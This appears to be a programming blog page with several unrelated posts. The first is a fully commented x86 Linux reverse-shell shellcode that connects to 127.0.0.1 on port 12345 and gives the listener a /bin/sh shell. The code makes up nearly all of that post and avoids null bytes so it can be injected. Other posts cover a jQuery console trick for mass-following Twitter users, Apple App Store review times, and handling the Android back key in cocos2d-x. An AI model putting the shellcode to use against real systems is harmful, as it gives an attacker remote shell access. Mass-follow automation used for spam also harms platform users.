x86 reverse shellcode documented example

Writing a shellcode is hard, documented references are scarce and figuring out how to translate function calls into assembly is a pain. I’m posting here a shellcode I wrote a while back. It’s not a perfect example, it can be shorter and more elegant, but it works and does not contain null bytes – It should get you started if you need help writing your own variety of shellcode.

This is a reverse shell code, it will connect back to 127.0.0.1 on port 12345 hoping to find a listening server and provide a shell.

# x86 linux reverse shellcode example
# aviran.org
 
xor eax, eax        # setting eax,ebx,edx to zero
xor ebx, ebx
xor edx, edx
 
push 0x6            # pushing 6,1,2 to the stack
push 0x1            # these are the values for
push 0x2            # socket(2,1,6)
mov ecx, esp        # set args for call
mov bl, 1           # 1 means socket()
mov al, 0x66        # 0x66 means sys-socket
int 0x80            # call socket()
mov esi, eax        # sockfd
xor ebx, ebx        # ebx = 0
xor ecx, ecx        # ebx = 0
xor edx, edx        # ebx = 0
mov al, 0x66        # socket syscalls
 
push ebx            # padding
push ebx            # padding
mov bl, 0x3         # ebx = 3 = connect()
 
mov dl,0x1          # pushing sockaddr_in into memory
shl edx,24          # IP,Port,AF_INET, cant push word so pushing port and AF_INET together
mov dl,0x7f         # setting edx to be 0x0100007f - 127.0.0.1
push edx
xor edx,edx         # setting edx to be 0x39300002 - port 12345, AF_INET
mov dx,0x3930       # this is done to avoid null bytes
shl edx,16
mov dl,0x2
push edx
 
mov ecx, esp        # saving location of struct
                    # args for connect
push 0x10           # 0x10 size of struct
push ecx            # ecx - pointer to struct
push esi            # esi sockfd
mov ecx, esp       
int 0x80            # call connect
 
xor eax, eax
xor ebx,ebx
xor ecx,ecx
mov ebx,esi         # sockfd
mov al,0x3f         # dup2
mov cl, 0x2         # ecx = 2 = stderr
int 0x80            # call dup2()
 
xor eax, eax
mov al,0x3f
dec cl              # cl = 1 = stdout
int 0x80            # call dup2
 
xor eax, eax
mov al,0x3f
dec cl              # cl = 0 = stdin
int 0x80            # call dup2
 
xor eax,eax         #
xor ecx,ecx         #
xor edx,edx         #
 
mov al,11           # execve
push edx            # push 0 for end of string
push 0x68732f6e     # pushing //bin/sh
push 0x69622f2f
mov ebx, esp        # pointer to string
push edx            # push null
mov edx,esp         # edx is third var, gets null
push ebx            # push var to stack
mov ecx,esp         # set second variable
int 0x80            # make the call

How to mass follow all Twitter users in one page

Here’s a neat trick I found that allows you to follow in one action all the twitter users that are presented in a single page on twitter, you can use it on the search results or you can do it on the Followers or Following page of a given user.

I’m going to show you two similar ways, the first is a bit more simple and should be fine for most purposes, the second one is a bit more accurate, in the future you might have to modify them a little since Twitter might change their HTML a little (change names of CSS classes).

Twitter is using the jQuery JavaScript framework so you can call the click() function on all the Follow buttons for all of the users on that page, at the moment of writing this post every twitter Follow button code is:

<button class="user-actions-follow-button
				js-follow-btn follow-button btn small
				small-follow-btn"
				type="button">
		...
</button>

You can see it’s using a few CSS classes, any one of them can be used to query for a list of all of the buttons.

Open the Twitter page you want to perform the mass follow, scroll down as much as you want to increase the number of users Twitter is displaying.
Now open your browser’s JavaScript console (usually CTRL+Shift+K or CTRL+Shift+J) and input the following jQuery code:

$('.user-actions-follow-button').click();

Note that in this example I’m using the user-actions-follow-button css class name, and that it’s prefixed by a dot to tell jQuery it’s a CSS class.
Once you hit Enter, all the Follow buttons will be clicked.

This method simply click every “Follow” button in the page, if you already follow a user in that page you will effectively click an “Unfollow” button for that user instead.

You can modify the query to only select the buttons for the users you are not following/pending approval and so on by using the following CSS selector

$('.follow-text:visible').parent().click();

We’re selecting a span inside the button object, if it’s of class .follow-text and it’s visible, we want it’s parent – The follow button and we perform click() on that button.

Apple iOS application review time

Just sharing my latest experience of publishing an app on the Apple App Store, it took 5 days for the app to go from the initial state of Waiting for Review to In Review and a little less than 24 hours for it to be approved and Ready for Sale.
So basically, it took Apple 6 days to publish the app, most of the time the app was waiting to be reviewed.

Using the back button on Android with Cocos2d-x 3

Among the many changes done in version 3 of cocos2d-x CCLayer::backKeyClicked() has been deprecated. So how do you catch that back key click these day?
Here’s how, you need to override Layer::onKeyReleased() and compare the value of keyCode to KEY_ESCAPE, as shown in the following code

void MyLayer::onKeyReleased(EventKeyboard::KeyCode keyCode, Event *event) {
	if(keyCode == EventKeyboard::KeyCode::KEY_ESCAPE) {
		/*
			Handle the back click
		*/
	}
}

From there you just need to handle the click.
You will also need to enable the Keypad, otherwise the layer will not get notifications on such interactions.
You do that using Layer::setKeyboardEnabled(), set it to true in your Layer’s init() function.
In versions of cocos2d-x 3 prior to v3.3 you would use Layer::setKeypadEnabled() instead, which has been deprecated in later versions.